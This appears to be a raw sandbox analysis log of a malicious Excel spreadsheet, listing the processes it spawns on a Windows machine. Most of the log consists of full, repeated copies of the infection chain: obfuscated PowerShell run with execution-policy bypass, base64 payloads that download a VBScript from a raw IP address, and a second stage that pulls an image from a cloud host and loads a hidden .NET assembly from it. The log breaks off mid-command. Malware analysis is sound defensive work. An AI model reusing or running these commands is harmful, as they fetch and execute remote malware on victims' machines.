        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: Euro confirmation Sp.xlsReversingLabs: Detection: 23%
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9ECF.tmp" "c:\Users\user\AppData\Local\Temp\vlwyfswc\CSCD4E4666864B4048A31961A99612757D.TMP"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEC91.tmp" "c:\Users\user\AppData\Local\Temp\5djzgayy\CSC760185DBFBB46BF8363AB3E3456F7D3.TMP"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9ECF.tmp" "c:\Users\user\AppData\Local\Temp\vlwyfswc\CSCD4E4666864B4048A31961A99612757D.TMP"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 